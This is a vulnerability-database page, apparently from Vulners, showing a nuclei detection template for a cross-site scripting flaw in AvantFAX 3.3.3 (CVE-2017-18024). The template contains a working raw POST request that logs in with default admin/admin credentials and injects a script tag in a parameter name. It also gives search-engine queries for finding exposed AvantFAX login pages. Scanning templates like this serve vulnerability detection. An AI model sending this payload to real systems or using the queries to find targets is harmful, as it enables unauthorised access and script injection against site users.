Lucene search
K

AvantFAX 3.3.3 - Cross-Site Scripting

🗓️ 19 Jun 2026 11:10:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

AvantFAX 3.3.3 Cross-Site Scripting vulnerability allows execution of arbitrary JavaScript code in victim's browse

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2017-18024
8 Sep 202001:19
circl
CNVD
AvantFAX Cross-Site Scripting Vulnerability
12 Jan 201800:00
cnvd
CVE
CVE-2017-18024
10 Jan 201818:00
cve
Cvelist
CVE-2017-18024
10 Jan 201818:00
cvelist
EUVD
EUVD-2017-9164
7 Oct 202500:30
euvd
Hacker One
Endless Group: XSS on https://fax.pbx.itsendless.org/ (CVE-2017-18024)
20 Aug 202020:56
hackerone
NVD
CVE-2017-18024
10 Jan 201818:29
nvd
OSV
CVE-2017-18024
10 Jan 201818:29
osv
Packet Storm
AvantFAX 3.3.3 Cross Site Scripting
9 Jan 201800:00
packetstorm
Prion
Default credentials
10 Jan 201818:29
prion
Rows per page
id: CVE-2017-18024

info:
  name: AvantFAX 3.3.3 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: AvantFAX 3.3.3 contains a cross-site scripting vulnerability via an arbitrary parameter name submitted to the default URL, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of AvantFAX or apply the necessary security patches to mitigate the XSS vulnerability.
  reference:
    - https://hackerone.com/reports/963798
    - http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18024
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/NarbehJackson/Java-Xss-minitwit16
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-18024
    cwe-id: CWE-79
    epss-score: 0.04617
    epss-percentile: 0.90499
    cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: avantfax
    product: avantfax
    shodan-query: http.title:"avantfax - login"
    fofa-query: title="avantfax - login"
    google-query: intitle:"avantfax - login"
  tags: cve,cve2017,avantfax,hackerone,packetstorm,xss,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&password=admin&_submit_check=1&jlbqg<script>alert("{{randstr}}")</script>b7g0x=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert("{{randstr}}")</script>'
          - 'AvantFAX'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402206d6c586c4bb97e155f8e11db1d37923eec033930e98d1c46de74aa384681810c0220718cd576247e499cab2bb984ec10b61b50366298bd1dd40258c87a003cf76d34:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 36.1
EPSS0.04617
33